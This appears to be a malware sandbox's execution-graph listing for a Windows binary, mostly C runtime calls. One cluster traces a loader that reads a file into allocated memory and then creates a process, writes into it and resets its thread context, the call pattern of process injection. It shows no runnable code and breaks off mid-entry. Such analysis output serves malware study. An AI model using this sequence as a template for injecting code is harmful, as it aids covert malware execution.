                                                        execution_graph 8372 13b33fc 8373 13b3431 8372->8373 8374 13b340c 8372->8374 8374->8373 8379 13b4961 8374->8379 8380 13b496d __initptd 8379->8380 8381 13b36db __write_nolock 58 API calls 8380->8381 8382 13b4972 8381->8382 8383 13b7580 _abort 62 API calls 8382->8383 8384 13b4994 8383->8384 8385 13b46f1 8386 13b4869 __calloc_crt 58 API calls 8385->8386 8387 13b46fb EncodePointer 8386->8387 8388 13b4714 8387->8388 8389 13b6470 RtlUnwind 7814 13b1737 7817 13b3ec8 7814->7817 7816 13b173c 7816->7816 7818 13b3eeb 7817->7818 7819 13b3ef8 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 7817->7819 7818->7819 7820 13b3eef 7818->7820 7819->7820 7820->7816 7821 13b1f37 7828 13b58ce 7821->7828 7823 13b1f4a 7826 13b4831 _free 58 API calls 7823->7826 7827 13b1f55 7826->7827 7841 13b58d7 7828->7841 7830 13b1f3c 7830->7823 7831 13b5787 7830->7831 7832 13b5793 __initptd 7831->7832 7833 13b442f __lock 58 API calls 7832->7833 7836 13b579f 7833->7836 7834 13b5804 7871 13b581b 7834->7871 7836->7834 7838 13b57d8 DeleteCriticalSection 7836->7838 7858 13b7c39 7836->7858 7837 13b5810 __initptd 7837->7823 7840 13b4831 _free 58 API calls 7838->7840 7840->7836 7842 13b58e3 __initptd 7841->7842 7843 13b442f __lock 58 API calls 7842->7843 7850 13b58f2 7843->7850 7844 13b5990 7854 13b59b2 7844->7854 7846 13b1f9d __getstream 59 API calls 7846->7850 7847 13b599c __initptd 7847->7830 7849 13b5824 82 API calls __fflush_nolock 7849->7850 7850->7844 7850->7846 7850->7849 7851 13b597f 7850->7851 7852 13b2007 __getstream 2 API calls 7851->7852 7853 13b598d 7852->7853 7853->7850 7857 13b4599 LeaveCriticalSection 7854->7857 7856 13b59b9 7856->7847 7857->7856 7859 13b7c45 __initptd 7858->7859 7860 13b7c59 7859->7860 7861 13b7c71 7859->7861 7862 13b1cc3 __cftog_l 58 API calls 7860->7862 7863 13b1f5e __lock_file 59 API calls 7861->7863 7870 13b7c69 __initptd 7861->7870 7864 13b7c5e 7862->7864 7865 13b7c83 7863->7865 
7866 13b1e89 __cftog_l 9 API calls 7864->7866 7874 13b7bcd 7865->7874 7866->7870 7870->7836 7933 13b4599 LeaveCriticalSection 7871->7933 7873 13b5822 7873->7837 7875 13b7bdc 7874->7875 7876 13b7bf0 7874->7876 7877 13b1cc3 __cftog_l 58 API calls 7875->7877 7882 13b7bec 7876->7882 7893 13b586a 7876->7893 7878 13b7be1 7877->7878 7880 13b1e89 __cftog_l 9 API calls 7878->7880 7880->7882 7890 13b7ca8 7882->7890 7885 13b2873 __filbuf 58 API calls 7886 13b7c0a 7885->7886 7903 13b88a3 7886->7903 7888 13b7c10 7888->7882 7889 13b4831 _free 58 API calls 7888->7889 7889->7882 7891 13b1fcd __wfsopen 2 API calls 7890->7891 7892 13b7cae 7891->7892 7892->7870 7894 13b58a1 7893->7894 7895 13b587d 7893->7895 7899 13b914b 7894->7899 7895->7894 7896 13b2873 __filbuf 58 API calls 7895->7896 7897 13b589a 7896->7897 7898 13b7d99 __write 78 API calls 7897->7898 7898->7894 7900 13b7c04 7899->7900 7901 13b9158 7899->7901 7900->7885 7901->7900 7902 13b4831 _free 58 API calls 7901->7902 7902->7900 7904 13b88af __initptd 7903->7904 7905 13b88bc 7904->7905 7906 13b88d3 7904->7906 7907 13b1c8f __write 58 API calls 7905->7907 7908 13b895e 7906->7908 7910 13b88e3 7906->7910 7909 13b88c1 7907->7909 7911 13b1c8f __write 58 API calls 7908->7911 7912 13b1cc3 __cftog_l 58 API calls 7909->7912 7913 13b890b 7910->7913 7914 13b8901 7910->7914 7915 13b8906 7911->7915 7923 13b88c8 __initptd 7912->7923 7917 13b6c88 ___lock_fhandle 59 API calls 7913->7917 7916 13b1c8f __write 58 API calls 7914->7916 7918 13b1cc3 __cftog_l 58 API calls 7915->7918 7916->7915 7919 13b8911 7917->7919 7920 13b896a 7918->7920 7921 13b892f 7919->7921 7922 13b8924 7919->7922 7925 13b1e89 __cftog_l 9 API calls 7920->7925 7924 13b1cc3 __cftog_l 58 API calls 7921->7924 7926 13b897e __close_nolock 61 API calls 7922->7926 7923->7888 7927 13b892a 7924->7927 7925->7923 7926->7927 7929 13b8956 7927->7929 7932 13b702e LeaveCriticalSection 7929->7932 7931 13b895c 7931->7923 7932->7931 7933->7873 8390 13b7577 8391 13b17be __lock 58 API calls 
8390->8391 8392 13b757e 8391->8392 7934 13bb2a9 7937 13bb2c1 7934->7937 7938 13bb2eb 7937->7938 7939 13bb2d2 7937->7939 7952 13b95d7 7938->7952 7943 13b9549 7939->7943 7942 13bb2bc 7944 13b4bfc _LocaleUpdate::_LocaleUpdate 58 API calls 7943->7944 7945 13b956d 7944->7945 7955 13ba184 7945->7955 7950 13b5770 __atodbl_l 6 API calls 7951 13b95d3 7950->7951 7951->7942 7967 13b94a5 7952->7967 7956 13ba1cc 7955->7956 7962 13ba1dc ___mtold12 7955->7962 7957 13b1cc3 __cftog_l 58 API calls 7956->7957 7958 13ba1d1 7957->7958 7959 13b1e89 __cftog_l 9 API calls 7958->7959 7959->7962 7960 13b5770 __atodbl_l 6 API calls 7961 13b9585 7960->7961 7963 13b96a0 7961->7963 7962->7960 7966 13b96f8 7963->7966 7964 13b5770 __atodbl_l 6 API calls 7965 13b9592 7964->7965 7965->7950 7966->7964 7968 13b4bfc _LocaleUpdate::_LocaleUpdate 58 API calls 7967->7968 7969 13b94d2 7968->7969 7970 13ba184 ___strgtold12_l 58 API calls 7969->7970 7971 13b94ea 7970->7971 7976 13b9c12 7971->7976 7974 13b5770 __atodbl_l 6 API calls 7975 13b9545 7974->7975 7975->7942 7979 13b9c6a 7976->7979 7977 13b5770 __atodbl_l 6 API calls 7978 13b9507 7977->7978 7978->7974 7979->7977 7980 13ba92c 7983 13ba94d 7980->7983 7982 13ba948 7984 13ba958 7983->7984 7985 13ba9b7 7983->7985 7984->7985 7987 13ba95d 7984->7987 8051 13bae9e 7985->8051 7988 13ba97b 7987->7988 7989 13ba962 7987->7989 7991 13ba99e 7988->7991 7993 13ba985 7988->7993 7997 13bb058 7989->7997 8038 13ba9d3 7991->8038 8016 13bb119 7993->8016 7996 13ba99c 7996->7982 8068 13bc11f 7997->8068 8000 13bb09d 8003 13bb0b5 8000->8003 8004 13bb0a5 8000->8004 8001 13bb08d 8002 13b1cc3 __cftog_l 58 API calls 8001->8002 8006 13bb092 8002->8006 8080 13bbfa7 8003->8080 8005 13b1cc3 __cftog_l 58 API calls 8004->8005 8007 13bb0aa 8005->8007 8009 13b1e89 __cftog_l 9 API calls 8006->8009 8010 13b1e89 __cftog_l 9 API calls 8007->8010 8012 13bb099 8009->8012 8010->8012 8011 13bb0e8 8011->8012 8089 13baf6c 8011->8089 8014 13b5770 __atodbl_l 6 API calls 8012->8014 8015 13ba976 
8014->8015 8015->7982 8017 13bc11f __fltout2 58 API calls 8016->8017 8018 13bb147 8017->8018 8019 13bb14e 8018->8019 8020 13bb161 8018->8020 8021 13b1cc3 __cftog_l 58 API calls 8019->8021 8022 13bb169 8020->8022 8023 13bb17c 8020->8023 8024 13bb153 8021->8024 8025 13b1cc3 __cftog_l 58 API calls 8022->8025 8028 13bbfa7 __fptostr 58 API calls 8023->8028 8026 13b1e89 __cftog_l 9 API calls 8024->8026 8027 13bb16e 8025->8027 8031 13bb15a 8026->8031 8029 13b1e89 __cftog_l 9 API calls 8027->8029 8030 13bb1a8 8028->8030 8029->8031 8030->8031 8032 13bb1ee 8030->8032 8034 13bb1c8 8030->8034 8033 13b5770 __atodbl_l 6 API calls 8031->8033 8118 13bad4d 8032->8118 8036 13bb214 8033->8036 8037 13baf6c __cftof2_l 58 API calls 8034->8037 8036->7996 8037->8031 8039 13b4bfc _LocaleUpdate::_LocaleUpdate 58 API calls 8038->8039 8040 13ba9f8 8039->8040 8041 13baa0f 8040->8041 8042 13baa18 8040->8042 8043 13b1cc3 __cftog_l 58 API calls 8041->8043 8045 13baa21 8042->8045 8049 13baa35 8042->8049 8044 13baa14 8043->8044 8048 13b1e89 __cftog_l 9 API calls 8044->8048 8047 13b1cc3 __cftog_l 58 API calls 8045->8047 8046 13baa30 _memset __alldvrm __cftoa_l _strrchr 8046->7996 8047->8044 8048->8046 8049->8046 8150 13bad2f 8049->8150 8052 13bc11f __fltout2 58 API calls 8051->8052 8053 13baed0 8052->8053 8054 13baee7 8053->8054 8055 13baed7 8053->8055 8056 13baeee 8054->8056 8059 13baef8 8054->8059 8057 13b1cc3 __cftog_l 58 API calls 8055->8057 8058 13b1cc3 __cftog_l 58 API calls 8056->8058 8060 13baedc 8057->8060 8058->8060 8061 13bbfa7 __fptostr 58 API calls 8059->8061 8062 13b1e89 __cftog_l 9 API calls 8060->8062 8063 13baf38 8061->8063 8064 13baee3 8062->8064 8063->8064 8065 13bad4d __cftoe2_l 58 API calls 8063->8065 8066 13b5770 __atodbl_l 6 API calls 8064->8066 8065->8064 8067 13baf68 8066->8067 8067->7996 8069 13bc148 ___dtold 8068->8069 8096 13bc3bd 8069->8096 8074 13bc18a 8076 13b5770 __atodbl_l 6 API calls 8074->8076 8075 13bc1a0 8077 13b1e99 __invoke_watson 8 API calls 8075->8077 8078 
13bb086 8076->8078 8079 13bc1ac 8077->8079 8078->8000 8078->8001 8081 13bbfb9 8080->8081 8082 13bbfcf 8080->8082 8083 13b1cc3 __cftog_l 58 API calls 8081->8083 8082->8081 8086 13bbfd5 8082->8086 8084 13bbfbe 8083->8084 8085 13b1e89 __cftog_l 9 API calls 8084->8085 8088 13bbfc8 _memmove _strlen 8085->8088 8087 13b1cc3 __cftog_l 58 API calls 8086->8087 8086->8088 8087->8084 8088->8011 8090 13b4bfc _LocaleUpdate::_LocaleUpdate 58 API calls 8089->8090 8091 13baf89 8090->8091 8092 13b1cc3 __cftog_l 58 API calls 8091->8092 8095 13bafa5 _memset __shift 8091->8095 8093 13baf9b 8092->8093 8094 13b1e89 __cftog_l 9 API calls 8093->8094 8094->8095 8095->8012 8099 13bc412 8096->8099 8097 13bc484 8100 13bb7bd _$I10_OUTPUT 58 API calls 8097->8100 8098 13b5770 __atodbl_l 6 API calls 8101 13bc163 8098->8101 8099->8097 8102 13bc49d 8099->8102 8108 13bc424 8099->8108 8100->8108 8109 13bb7bd 8101->8109 8104 13bb7bd _$I10_OUTPUT 58 API calls 8102->8104 8103 13bcd59 8105 13b1e99 __invoke_watson 8 API calls 8103->8105 8104->8108 8106 13bcd90 8105->8106 8107 13bc435 8107->8098 8108->8103 8108->8107 8110 13bb7d6 8109->8110 8111 13bb7c8 8109->8111 8112 13b1cc3 __cftog_l 58 API calls 8110->8112 8111->8110 8116 13bb7ec 8111->8116 8113 13bb7dd 8112->8113 8114 13b1e89 __cftog_l 9 API calls 8113->8114 8115 13bb7e7 8114->8115 8115->8074 8115->8075 8116->8115 8117 13b1cc3 __cftog_l 58 API calls 8116->8117 8117->8113 8119 13b4bfc _LocaleUpdate::_LocaleUpdate 58 API calls 8118->8119 8120 13bad60 8119->8120 8121 13bad6d 8120->8121 8123 13bad76 8120->8123 8122 13b1cc3 __cftog_l 58 API calls 8121->8122 8124 13bad72 8122->8124 8125 13bad8b 8123->8125 8128 13bad9f __shift 8123->8128 8127 13b1e89 __cftog_l 9 API calls 8124->8127 8126 13b1cc3 __cftog_l 58 API calls 8125->8126 8126->8124 8135 13bad9a _memmove 8127->8135 8129 13bb7bd _$I10_OUTPUT 58 API calls 8128->8129 8130 13bae16 8129->8130 8131 13b1e99 __invoke_watson 8 API calls 8130->8131 8130->8135 8132 13bae9d 8131->8132 8133 13bc11f __fltout2 58 API 
calls 8132->8133 8134 13baed0 8133->8134 8136 13baee7 8134->8136 8137 13baed7 8134->8137 8135->8031 8138 13baef8 8136->8138 8139 13baeee 8136->8139 8140 13b1cc3 __cftog_l 58 API calls 8137->8140 8143 13bbfa7 __fptostr 58 API calls 8138->8143 8141 13b1cc3 __cftog_l 58 API calls 8139->8141 8142 13baedc 8140->8142 8141->8142 8144 13b1e89 __cftog_l 9 API calls 8142->8144 8145 13baf38 8143->8145 8146 13baee3 8144->8146 8145->8146 8147 13bad4d __cftoe2_l 58 API calls 8145->8147 8148 13b5770 __atodbl_l 6 API calls 8146->8148 8147->8146 8149 13baf68 8148->8149 8149->8031 8151 13bae9e __cftoe_l 58 API calls 8150->8151 8152 13bad48 8151->8152 8152->8046 6461 110809 6473 1106f7 GetPEB 6461->6473 6463 11086e 6464 1109a3 CreateFileW 6463->6464 6465 1109c8 6464->6465 6466 1109ca 6464->6466 6466->6465 6467 1109dd VirtualAlloc 6466->6467 6467->6465 6468 1109f7 ReadFile 6467->6468 6468->6465 6469 110a0f CloseHandle 6468->6469 6470 110a20 6469->6470 6474 110e98 6470->6474 6473->6463 6488 1106f7 GetPEB 6474->6488 6476 110eef 6477 110fda 6476->6477 6479 110fe7 6476->6479 6487 110a2b ExitProcess 6476->6487 6489 1111be 6477->6489 6479->6487 6510 110261 6479->6510 6481 1110ed 6482 11115a 6481->6482 6483 110261 11 API calls 6481->6483 6481->6487 6484 110261 11 API calls 6482->6484 6483->6481 6485 111179 6484->6485 6485->6487 6519 1101b2 6485->6519 6488->6476 6528 1106f7 GetPEB 6489->6528 6491 1111cc 6492 1112fa CreateProcessW 6491->6492 6509 1112d5 6491->6509 6493 111311 6492->6493 6492->6509 6494 111334 ReadProcessMemory 6493->6494 6493->6509 6495 111358 6494->6495 6494->6509 6496 11138b VirtualAllocEx 6495->6496 6529 110360 6495->6529 6497 1113b5 6496->6497 6496->6509 6499 110261 11 API calls 6497->6499 6501 1113cb 6499->6501 6500 11137f 6500->6496 6500->6509 6502 111425 6501->6502 6503 110261 11 API calls 6501->6503 6501->6509 6504 110261 11 API calls 6502->6504 6503->6501 6505 11143f 6504->6505 6506 111448 Wow64SetThreadContext 6505->6506 6505->6509 6507 11146d 6506->6507 6506->6509 
6508 1101b2 11 API calls 6507->6508 6508->6509 6509->6487 6511 11027c 6510->6511 6512 110736 GetPEB 6511->6512 6513 11029d 6512->6513 6514 1102a5 6513->6514 6515 11032f 6513->6515 6517 1103f8 10 API calls 6514->6517 6563 11017c 6515->6563 6518 110316 6517->6518 6518->6481 6520 1101cd 6519->6520 6521 110736 GetPEB 6520->6521 6522 1101ee 6521->6522 6523 1101f2 6522->6523 6524 110238 6522->6524 6526 1103f8 10 API calls 6523->6526 6566 11018e 6524->6566 6527 11022d 6526->6527 6527->6487 6528->6491 6530 110373 6529->6530 6538 110736 GetPEB 6530->6538 6532 110394 6533 110398 6532->6533 6534 1103de 6532->6534 6540 1103f8 GetPEB 6533->6540 6554 1101a0 6534->6554 6537 1103d3 6537->6500 6539 110759 6538->6539 6539->6532 6541 11045d 6540->6541 6557 110772 GetPEB 6541->6557 6544 1104e9 6545 1104f9 VirtualAlloc 6544->6545 6546 1105c2 6544->6546 6545->6546 6547 11050f ReadFile 6545->6547 6548 110614 6546->6548 6549 110609 VirtualFree 6546->6549 6547->6546 6550 110524 VirtualAlloc 6547->6550 6548->6537 6549->6548 6550->6546 6551 110547 6550->6551 6551->6546 6552 1105b1 VirtualFree 6551->6552 6553 1105ad CloseHandle 6551->6553 6552->6546 6553->6552 6555 1103f8 10 API calls 6554->6555 6556 1101aa 6555->6556 6556->6537 6558 110785 6557->6558 6560 1104da CreateFileW 6558->6560 6561 11061d GetPEB 6558->6561 6560->6544 6560->6546 6562 11064d 6561->6562 6562->6558 6564 1103f8 10 API calls 6563->6564 6565 110186 6564->6565 6565->6518 6567 1103f8 10 API calls 6566->6567 6568 110198 6567->6568 6568->6527 8393 13b2460 8394 13b248a 8393->8394 8395 13b2497 8393->8395 8397 13b5770 __atodbl_l 6 API calls 8394->8397 8396 13b5770 __atodbl_l 6 API calls 8395->8396 8403 13b24a7 __except_handler4 8396->8403 8397->8395 8398 13b25bf 8399 13b2574 __except_handler4 8399->8398 8400 13b25af 8399->8400 8401 13b5770 __atodbl_l 6 API calls 8399->8401 8402 13b5770 __atodbl_l 6 API calls 8400->8402 8401->8400 8402->8398 8403->8398 8403->8399 8405 13b24fe __IsNonwritableInCurrentImage 8403->8405 8411 13b2722 
RtlUnwind 8405->8411 8406 13b25d6 8408 13b5770 __atodbl_l 6 API calls 8406->8408 8407 13b253c __except_handler4 8407->8406 8409 13b5770 __atodbl_l 6 API calls 8407->8409 8410 13b25e6 __except_handler4 8408->8410 8409->8406 8411->8407 8412 13b16e7 8413 13b16fc 8412->8413 8414 13b16f6 8412->8414 8416 13b1701 __initptd 8413->8416 8418 13b17da 8413->8418 8415 13b187c _abort 58 API calls 8414->8415 8415->8413 8419 13b1932 _doexit 58 API calls 8418->8419 8420 13b17e5 8419->8420 8420->8416 8153 13b35a6 8155 13b35b2 __initptd 8153->8155 8154 13b35cb 8158 13b4831 _free 58 API calls 8154->8158 8159 13b35da 8154->8159 8155->8154 8156 13b36ba __initptd 8155->8156 8157 13b4831 _free 58 API calls 8155->8157 8157->8154 8158->8159 8160 13b4831 _free 58 API calls 8159->8160 8162 13b35e9 8159->8162 8160->8162 8161 13b35f8 8164 13b3607 8161->8164 8165 13b4831 _free 58 API calls 8161->8165 8162->8161 8163 13b4831 _free 58 API calls 8162->8163 8163->8161 8166 13b3616 8164->8166 8168 13b4831 _free 58 API calls 8164->8168 8165->8164 8167 13b3625 8166->8167 8169 13b4831 _free 58 API calls 8166->8169 8170 13b3637 8167->8170 8171 13b4831 _free 58 API calls 8167->8171 8168->8166 8169->8167 8172 13b442f __lock 58 API calls 8170->8172 8171->8170 8176 13b363f 8172->8176 8173 13b3662 8185 13b36c6 8173->8185 8176->8173 8178 13b4831 _free 58 API calls 8176->8178 8177 13b442f __lock 58 API calls 8183 13b3676 ___removelocaleref 8177->8183 8178->8173 8179 13b36a7 8188 13b36d2 8179->8188 8182 13b4831 _free 58 API calls 8182->8156 8183->8179 8184 13b715c ___freetlocinfo 58 API calls 8183->8184 8184->8179 8191 13b4599 LeaveCriticalSection 8185->8191 8187 13b366f 8187->8177 8192 13b4599 LeaveCriticalSection 8188->8192 8190 13b36b4 8190->8182 8191->8187 8192->8190 8193 13b9624 8194 13b962c __cfltcvt_init 8193->8194 8195 13b9637 8194->8195 8197 13bb3ca 8194->8197 8203 13bc2af 8197->8203 8199 13bb3dd 8200 13bb3e4 8199->8200 8201 13b1e99 __invoke_watson 8 API calls 8199->8201 8200->8195 8202 13bb3f0 
8201->8202 8204 13bc2cb __control87 8203->8204 8205 13bc2eb __control87 8203->8205 8206 13b1cc3 __cftog_l 58 API calls 8204->8206 8205->8199 8207 13bc2e1 8206->8207 8208 13b1e89 __cftog_l 9 API calls 8207->8208 8208->8205 8421 13b4bdf 8424 13b4fc3 8421->8424 8423 13b4bee 8425 13b4fcf __initptd 8424->8425 8426 13b36db __write_nolock 58 API calls 8425->8426 8427 13b4fd7 8426->8427 8428 13b4f1d _LocaleUpdate::_LocaleUpdate 58 API calls 8427->8428 8429 13b4fe1 8428->8429 8449 13b4cbe 8429->8449 8432 13b48b1 __malloc_crt 58 API calls 8433 13b5003 8432->8433 8434 13b5130 __initptd 8433->8434 8456 13b516b 8433->8456 8434->8423 8437 13b5039 8442 13b4831 _free 58 API calls 8437->8442 8443 13b5059 8437->8443 8438 13b5140 8438->8434 8439 13b5153 8438->8439 8440 13b4831 _free 58 API calls 8438->8440 8441 13b1cc3 __cftog_l 58 API calls 8439->8441 8440->8439 8441->8434 8442->8443 8443->8434 8444 13b442f __lock 58 API calls 8443->8444 8446 13b5088 8444->8446 8445 13b5116 8466 13b5135 8445->8466 8446->8445 8448 13b4831 _free 58 API calls 8446->8448 8448->8445 8450 13b4bfc _LocaleUpdate::_LocaleUpdate 58 API calls 8449->8450 8451 13b4cce 8450->8451 8452 13b4cef 8451->8452 8453 13b4cdd GetOEMCP 8451->8453 8454 13b4cf4 GetACP 8452->8454 8455 13b4d06 8452->8455 8453->8455 8454->8455 8455->8432 8455->8434 8457 13b4cbe getSystemCP 60 API calls 8456->8457 8458 13b5188 8457->8458 8460 13b51d9 IsValidCodePage 8458->8460 8463 13b518f setSBCS 8458->8463 8465 13b51fe _memset __setmbcp_nolock 8458->8465 8459 13b5770 __atodbl_l 6 API calls 8461 13b502a 8459->8461 8462 13b51eb GetCPInfo 8460->8462 8460->8463 8461->8437 8461->8438 8462->8463 8462->8465 8463->8459 8469 13b4d8b GetCPInfo 8465->8469 8479 13b4599 LeaveCriticalSection 8466->8479 8468 13b513c 8468->8434 8470 13b4e6d 8469->8470 8475 13b4dc3 8469->8475 8472 13b5770 __atodbl_l 6 API calls 8470->8472 8471 13b7a55 ___crtGetStringTypeA 61 API calls 8473 13b4e24 8471->8473 8474 13b4f19 8472->8474 8476 13b7917 ___crtLCMapStringA 62 API calls 
8473->8476 8474->8463 8475->8471 8477 13b4e45 8476->8477 8478 13b7917 ___crtLCMapStringA 62 API calls 8477->8478 8478->8470 8479->8468 8480 13b16d3 8483 13b344b 8480->8483 8484 13b36f3 __getptd_noexit 58 API calls 8483->8484 8485 13b16e4 8484->8485 8215 13b2690 8216 13b26a2 8215->8216 8218 13b26b0 @_EH4_CallFilterFunc@8 8215->8218 8217 13b5770 __atodbl_l 6 API calls 8216->8217 8217->8218 8486 13b93d0 8487 13b93da 8486->8487 8488 13b93e6 8486->8488 8487->8488 8489 13b93df CloseHandle 8487->8489 8489->8488 8490 13b1ec9 8491 13b1ed1 8490->8491 8492 13b4869 __calloc_crt 58 API calls 8491->8492 8493 13b1eeb 8492->8493 8494 13b1f04 8493->8494 8495 13b4869 __calloc_crt 58 API calls 8493->8495 8495->8494 8223 13bb303 8226 13bb314 8223->8226 8227 13b4bfc _LocaleUpdate::_LocaleUpdate 58 API calls 8226->8227 8228 13bb326 8227->8228 8235 13bb791 8228->8235 8230 13bb346 8232 13bb791 __forcdecpt_l 65 API calls 8230->8232 8234 13bb310 8232->8234 8233 13bb332 8233->8230 8240 13bb623 8233->8240 8236 13bb7af 8235->8236 8237 13bb79d 8235->8237 8245 13bb64e 8236->8245 8237->8233 8241 13bb62f 8240->8241 8242 13bb640 8240->8242 8241->8233 8323 13bb5d1 8242->8323 8246 13b4bfc _LocaleUpdate::_LocaleUpdate 58 API calls 8245->8246 8247 13bb661 8246->8247 8248 13bb6cd 8247->8248 8249 13bb66d 8247->8249 8250 13bb6eb 8248->8250 8264 13b917b 8248->8264 8256 13bb682 8249->8256 8257 13bc30c 8249->8257 8252 13b1cc3 __cftog_l 58 API calls 8250->8252 8254 13bb6f1 8250->8254 8252->8254 8267 13b7917 8254->8267 8256->8233 8258 13b4bfc _LocaleUpdate::_LocaleUpdate 58 API calls 8257->8258 8259 13bc31e 8258->8259 8260 13b917b __isleadbyte_l 58 API calls 8259->8260 8263 13bc32b 8259->8263 8261 13bc34f 8260->8261 8272 13b7a55 8261->8272 8263->8256 8265 13b4bfc _LocaleUpdate::_LocaleUpdate 58 API calls 8264->8265 8266 13b918c 8265->8266 8266->8250 8268 13b4bfc _LocaleUpdate::_LocaleUpdate 58 API calls 8267->8268 8269 13b7928 8268->8269 8294 13b7713 8269->8294 8273 13b4bfc _LocaleUpdate::_LocaleUpdate 58 API 
calls 8272->8273 8274 13b7a66 8273->8274 8277 13b795d 8274->8277 8278 13b7977 8277->8278 8279 13b7984 MultiByteToWideChar 8277->8279 8278->8279 8280 13b79a9 8279->8280 8282 13b79b0 8279->8282 8281 13b5770 __atodbl_l 6 API calls 8280->8281 8283 13b7a51 8281->8283 8284 13b1147 _malloc 58 API calls 8282->8284 8288 13b79d2 _memset __crtGetStringTypeA_stat 8282->8288 8283->8263 8284->8288 8285 13b7a0e MultiByteToWideChar 8286 13b7a38 8285->8286 8287 13b7a28 GetStringTypeW 8285->8287 8290 13b75c3 8286->8290 8287->8286 8288->8280 8288->8285 8291 13b75de 8290->8291 8292 13b75cd 8290->8292 8291->8280 8292->8291 8293 13b4831 _free 58 API calls 8292->8293 8293->8291 8296 13b772c MultiByteToWideChar 8294->8296 8300 13b7792 8296->8300 8307 13b778b 8296->8307 8297 13b77ba __crtGetStringTypeA_stat 8299 13b77f1 MultiByteToWideChar 8297->8299 8297->8307 8298 13b5770 __atodbl_l 6 API calls 8301 13b7913 8298->8301 8302 13b780a 8299->8302 8311 13b7858 8299->8311 8300->8297 8305 13b1147 _malloc 58 API calls 8300->8305 8301->8256 8319 13b7659 8302->8319 8304 13b75c3 __crtGetStringTypeA_stat 58 API calls 8304->8307 8305->8297 8306 13b781e 8308 13b7834 8306->8308 8309 13b7860 8306->8309 8306->8311 8307->8298 8310 13b7659 __crtLCMapStringA_stat LCMapStringW 8308->8310 8308->8311 8313 13b1147 _malloc 58 API calls 8309->8313 8317 13b7888 __crtGetStringTypeA_stat 8309->8317 8310->8311 8311->8304 8312 13b7659 __crtLCMapStringA_stat LCMapStringW 8314 13b78cb 8312->8314 8313->8317 8315 13b78f3 8314->8315 8318 13b78e5 WideCharToMultiByte 8314->8318 8316 13b75c3 __crtGetStringTypeA_stat 58 API calls 8315->8316 8316->8311 8317->8311 8317->8312 8318->8315 8320 13b7669 8319->8320 8321 13b7684 __crtLCMapStringA_stat 8319->8321 8320->8306 8322 13b769b LCMapStringW 8321->8322 8322->8306 8324 13b4bfc _LocaleUpdate::_LocaleUpdate 58 API calls 8323->8324 8325 13bb5e2 8324->8325 8326 13bb5f9 8325->8326 8327 13bc30c __isctype_l 61 API calls 8325->8327 8326->8233 8327->8326 8328 13b3283 
IsProcessorFeaturePresent 8329 13b32a9 8328->8329 6569 13b15c0 6570 13b15cc __initptd 6569->6570 6606 13b407f GetStartupInfoW 6570->6606 6572 13b15d1 6608 13b1d17 GetProcessHeap 6572->6608 6574 13b1629 6575 13b1634 6574->6575 6688 13b1710 6574->6688 6609 13b3815 6575->6609 6578 13b163a 6579 13b1645 __RTC_Initialize 6578->6579 6580 13b1710 _fast_error_exit 58 API calls 6578->6580 6630 13b38a8 6579->6630 6580->6579 6582 13b1654 6583 13b1660 GetCommandLineW 6582->6583 6584 13b1710 _fast_error_exit 58 API calls 6582->6584 6649 13b3fa4 GetEnvironmentStringsW 6583->6649 6586 13b165f 6584->6586 6586->6583 6589 13b167a 6590 13b1685 6589->6590 6696 13b17be 6589->6696 6659 13b3d99 6590->6659 6593 13b168b 6594 13b17be __lock 58 API calls 6593->6594 6596 13b1696 6593->6596 6594->6596 6673 13b17f8 6596->6673 6597 13b169e 6598 13b16a9 __wwincmdln 6597->6598 6599 13b17be __lock 58 API calls 6597->6599 6679 13b1000 6598->6679 6599->6598 6602 13b16cc 6706 13b17e9 6602->6706 6605 13b16d1 __initptd 6607 13b4095 6606->6607 6607->6572 6608->6574 6709 13b1890 RtlEncodePointer 6609->6709 6611 13b381a 6715 13b4560 6611->6715 6614 13b3823 6719 13b388b 6614->6719 6619 13b3840 6731 13b4869 6619->6731 6622 13b3882 6623 13b388b __mtterm 61 API calls 6622->6623 6626 13b3887 6623->6626 6625 13b3861 6625->6622 6627 13b3867 6625->6627 6626->6578 6740 13b3762 6627->6740 6629 13b386f GetCurrentThreadId 6629->6578 6631 13b38b4 __initptd 6630->6631 6632 13b442f __lock 58 API calls 6631->6632 6633 13b38bb 6632->6633 6634 13b4869 __calloc_crt 58 API calls 6633->6634 6636 13b38cc 6634->6636 6635 13b3937 GetStartupInfoW 6637 13b3a7b 6635->6637 6638 13b394c 6635->6638 6636->6635 6639 13b38d7 __initptd @_EH4_CallFilterFunc@8 6636->6639 6640 13b3b43 6637->6640 6643 13b3ac8 GetStdHandle 6637->6643 6644 13b3adb GetFileType 6637->6644 6648 13b40a2 __mtinitlocks InitializeCriticalSectionAndSpinCount 6637->6648 6638->6637 6642 13b4869 __calloc_crt 58 API calls 6638->6642 6646 13b399a 6638->6646 6639->6582 7004 
13b3b53 6640->7004 6642->6638 6643->6637 6644->6637 6645 13b39ce GetFileType 6645->6646 6646->6637 6646->6645 6647 13b40a2 __mtinitlocks InitializeCriticalSectionAndSpinCount 6646->6647 6647->6646 6648->6637 6650 13b1670 6649->6650 6651 13b3fb5 6649->6651 6655 13b3b5c GetModuleFileNameW 6650->6655 6652 13b48b1 __malloc_crt 58 API calls 6651->6652 6653 13b3fdb _memmove 6652->6653 6654 13b3ff1 FreeEnvironmentStringsW 6653->6654 6654->6650 6656 13b3b90 _wparse_cmdline 6655->6656 6657 13b48b1 __malloc_crt 58 API calls 6656->6657 6658 13b3bd0 _wparse_cmdline 6656->6658 6657->6658 6658->6589 6660 13b3daa 6659->6660 6661 13b3db2 __wsetenvp 6659->6661 6660->6593 6662 13b4869 __calloc_crt 58 API calls 6661->6662 6665 13b3ddb __wsetenvp 6662->6665 6663 13b3e32 6664 13b4831 _free 58 API calls 6663->6664 6664->6660 6665->6660 6665->6663 6666 13b4869 __calloc_crt 58 API calls 6665->6666 6667 13b3e57 6665->6667 6668 13b5457 __wsetenvp 58 API calls 6665->6668 6670 13b3e6e 6665->6670 6666->6665 6669 13b4831 _free 58 API calls 6667->6669 6668->6665 6669->6660 6671 13b1e99 __invoke_watson 8 API calls 6670->6671 6672 13b3e7a 6671->6672 6672->6593 6674 13b1804 __IsNonwritableInCurrentImage 6673->6674 7008 13b4942 6674->7008 6676 13b1822 __initterm_e 6678 13b1841 __cinit __IsNonwritableInCurrentImage 6676->6678 7011 13b481c 6676->7011 6678->6597 6680 13b1147 _malloc 58 API calls 6679->6680 6681 13b1013 6680->6681 7077 13b11d9 6681->7077 6685 13b1084 6685->6602 6703 13b1a61 6685->6703 6686 13b104d _memset 6686->6685 6687 13b107b EnumSystemCodePagesW 6686->6687 6687->6685 6689 